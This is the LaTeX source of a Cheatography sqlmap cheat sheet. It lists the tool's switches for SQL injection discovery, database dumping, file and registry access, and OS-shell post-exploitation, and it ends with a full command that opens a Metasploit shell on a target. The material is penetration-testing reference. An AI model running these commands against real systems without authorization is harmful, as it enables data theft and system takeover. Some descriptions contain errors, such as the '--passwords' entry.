\documentclass[10pt,a4paper]{article}

% Packages
\usepackage{fancyhdr}           % For header and footer
\usepackage{multicol}           % Allows multicols in tables
\usepackage{tabularx}           % Intelligent column widths
\usepackage{tabulary}           % Used in header and footer
\usepackage{hhline}             % Border under tables
\usepackage{graphicx}           % For images
\usepackage{xcolor}             % For hex colours
%\usepackage[utf8x]{inputenc}    % For unicode character support
\usepackage[T1]{fontenc}        % Without this we get weird character replacements
\usepackage{colortbl}           % For coloured tables
\usepackage{setspace}           % For line height
\usepackage{lastpage}           % Needed for total page number
\usepackage{seqsplit}           % Splits long words.
%\usepackage{opensans}          % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem}     % For underlining links
% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath}            % Symbols
\usepackage{MnSymbol}           % Symbols
\usepackage{wasysym}            % Symbols
%\usepackage[english,german,french,spanish,italian]{babel}              % Languages

% Document Info
\author{binca}
\pdfinfo{
  /Title (sqlmap.pdf)
  /Creator (Cheatography)
  /Author (binca)
  /Subject (sqlmap Cheat Sheet)
}

% Lengths and widths
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm} % Space between columns
\setlength{\headsep}{-12pt} % Reduce space between header and content
\setlength{\headheight}{85pt} % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt} % Remove footer line
\renewcommand{\headrulewidth}{0pt} % Remove header line
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit
% This two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour
\newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols
\newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns
\newcommand{\tn}{\tabularnewline} % Required as custom column type in use

% Font and Colours
\definecolor{HeadBackground}{HTML}{333333}
\definecolor{FootBackground}{HTML}{666666}
\definecolor{TextColor}{HTML}{333333}
\definecolor{DarkBackground}{HTML}{918027}
\definecolor{LightBackground}{HTML}{F8F7F1}
\renewcommand{\familydefault}{\sfdefault}
\color{TextColor}

% Header and Footer
\pagestyle{fancy}
\fancyhead{} % Set header to blank
\fancyfoot{} % Set footer to blank
\fancyhead[L]{
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{C}
    \SetRowColor{DarkBackground}
    \vspace{-7pt}
    {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent
        \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}}
    }
\end{tabulary}
\columnbreak
\begin{tabulary}{11cm}{L}
    \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{sqlmap Cheat Sheet}}}} \\
    \normalsize{by \textcolor{DarkBackground}{binca} via \textcolor{DarkBackground}{\uline{cheatography.com/44948/cs/13352/}}}
\end{tabulary}
\end{multicols}}

\fancyfoot[L]{ \footnotesize
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{LL}
  \SetRowColor{FootBackground}
  \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}}  \\
  \vspace{-2pt}binca \\
  \uline{cheatography.com/binca} \\
  \end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}}  \\
   \vspace{-2pt}Not Yet Published.\\
   Updated 9th November, 2017.\\
   Page {\thepage} of \pageref{LastPage}.
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}}  \\
  \SetRowColor{white}
  \vspace{-5pt}
  %\includegraphics[width=48px,height=48px]{dave.jpeg}
  Measure your website readability!\\
  www.readability-score.com
\end{tabulary}
\end{multicols}}


\begin{document}
\raggedright
\raggedcolumns

% Set font size to small. Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize % Small font.

\begin{multicols*}{2}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Other SQLi Tools}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Numerous tools available for asssiting in the discovery of SQLi flaws.} \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Few tools go beyond data exfiltration and many are not currently managed.} \tn 
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{NOT BEING UPDATED: \{\{nl\}\} {\bf{BBQSQL}} is a Python framework to ease and speed the exploitation of blind SQLi flaws.  2 Types of blind SQL attack: \{\{nl\}\} {\bf{Binary Search}}: Typical technique that splits the character set in one-half \{\{nl\}\} {\bf{Frequency Search}}: Based on letters' frequency of occurence in English language text. \{\{nl\}\} Attacks can be coupled with different indicators including timing, HTTP headers, content, size HTTP status codes, and others.} \tn 
% Row Count 14 (+ 10)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{About}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Open source, Python-based, command-line SQLi tool} \tn 
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Performs {\bf{In-band/Inline and Blind}} SQLi discovery and exploitation.} \tn 
% Row Count 3 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Supports many RDBMS including {\bf{MySQL, MSSQL, Oracle, PostgreSQL, SQLite}}} \tn 
% Row Count 5 (+ 2)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Integrates with {\bf{Metasploit, Burp, w3af, and ZAP}}} \tn 
% Row Count 7 (+ 2)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Exploit techniques include blind timing, error-based, blind boolean, stack queries, UNION and more} \tn 
% Row Count 9 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{2 cm} x{6 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Help}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{-h}} & substantial verbosity \tn 
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
{\bf{-hh}} & oh my verbosity \tn 
% Row Count 2 (+ 1)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{There is also a user guide.  Sqlmap has many command-line switches to help with discovery and exploit.}  \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{1.76 cm} x{6.24 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Initial Targeting}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{-u}} & A URL to kick off sqlmap \tn 
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
{\bf{-{}-crawl}} & Spiders site to discover entry points \tn 
% Row Count 3 (+ 2)
% Row 2
\SetRowColor{LightBackground}
{\bf{-{}-forms}} & Targets forms for injection \tn 
% Row Count 5 (+ 2)
% Row 3
\SetRowColor{white}
{\bf{-{}-dbms}} & Can inform sqlmap of the type of DB if known \tn 
% Row Count 7 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{2.96 cm} x{5.04 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Authorization, Sessions, and Proxies}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{-r / -l }} & Captured HTTP Request or proxy log as starting point, can bridge authentication gap. \tn 
% Row Count 4 (+ 4)
% Row 1
\SetRowColor{white}
{\bf{-{}-cookie}}\{\{nobreak\}\} & Manually sets cookies \tn 
% Row Count 6 (+ 2)
% Row 2
\SetRowColor{LightBackground}
{\bf{ -{}-proxy}} & Have sqlmap go through Burp, ZAP, or other proxy \tn 
% Row Count 8 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{If you have already authenticated or interacted with the target the above switches can be useful. \newline There are some nuances to sqlmap with proxies because it does not automatically inherit an authenticated session active in y our proxy.  It requires configuration. \newline In ZAP, toggle the "Enable Session Tracking". \newline In Burp, update Session handling rules under Options\textgreater{}Sessions.  The default only includes browsers and scanner. \newline Note: There may be a performance impact.}  \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{2.96 cm} x{5.04 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{DB Data Exfil}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{-{}-all}} & Dump all data \&\& metadata \tn 
% Row Count 1 (+ 1)
% Row 1
\SetRowColor{white}
{\bf{-{}-count}}\{\{nobreak\}\} & No data exfiltrated, simply provides a count of records.  Useful for testing sensitive data stores. \tn 
% Row Count 5 (+ 4)
% Row 2
\SetRowColor{LightBackground}
{\bf{-{}-dump}} & Steals data given the applied constraints. \{\{nl\}\} Example: {\bf{-D Orders -T Customers -{}-dump}} \tn 
% Row Count 9 (+ 4)
% Row 3
\SetRowColor{white}
{\bf{-{}-search}}\{\{nobreak\}\} & Search DB/table for a string \tn 
% Row Count 11 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{4.32 cm} x{3.68 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Beyond Data Exfiltration}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{-{}-users}} & Enumerate DB user accounts \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
{\bf{-{}-passwords}}\{\{nobreak\}\} & Download files to attack system \tn 
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
{\bf{-{}-file-read}} & Download files to attack system \tn 
% Row Count 6 (+ 2)
% Row 3
\SetRowColor{white}
{\bf{-{}-file-write}} & Upload files to DB system \tn 
% Row Count 8 (+ 2)
% Row 4
\SetRowColor{LightBackground}
{\bf{-{}-reg-read/-{}-reg-write}}\{\{nobreak\}\} & Read/Write Windows registry keys \tn 
% Row Count 10 (+ 2)
% Row 5
\SetRowColor{white}
{\bf{-{}-reg-add/-{}-reg-del}}\{\{nobreak\}\} & Add/Delete Windows registry keys \tn 
% Row Count 12 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} }
\SetRowColor{DarkBackground}
\mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Post Exploitation}}  \tn
% Row 0
\SetRowColor{LightBackground}
{\bf{-{}-{}-priv-esc}}\{\{nobreak\}\} & Escalate privileges of DBB \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
{\bf{-{}-sql-query / -{}-sql-shell}}\{\{nobreak\}\} & Run single SQL query or get simulated active shell \tn 
% Row Count 5 (+ 3)
% Row 2
\SetRowColor{LightBackground}
{\bf{-{}-os-cmd / -{}-os-shell}}\{\{nobreak\}\} & Execute single OS command or get simulated interactive OS shell \tn 
% Row Count 9 (+ 4)
% Row 3
\SetRowColor{white}
{\bf{-{}-os-pwn}} & OOB Metasploit \seqsplit{shell/VNC/Meterpreter}, requires an available OOB connection \tn 
% Row Count 13 (+ 4)
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\SetRowColor{LightBackground}
\mymulticolumn{2}{x{8.4cm}}{Note: Requires database to be running a web server with web root that database account can write to and reach.  Most effective after pivoting or during an internal engagement.}  \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}--}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{MSF Shell with SQL Map}}  \tn
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{\$ cd \seqsplit{/opt/metasploit-framework} \newline \$ sqlmap -u \seqsplit{"domain/sqli/?id=1\&submit=submit"} -{}-cookie="Cookie Value" -{}-proxy http://localhost:8080 -{}-user-agent 88 -{}-os-pwn -msf-path /opt/metaspoit-framework} \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}


% That's all folks
\end{multicols*}

\end{document}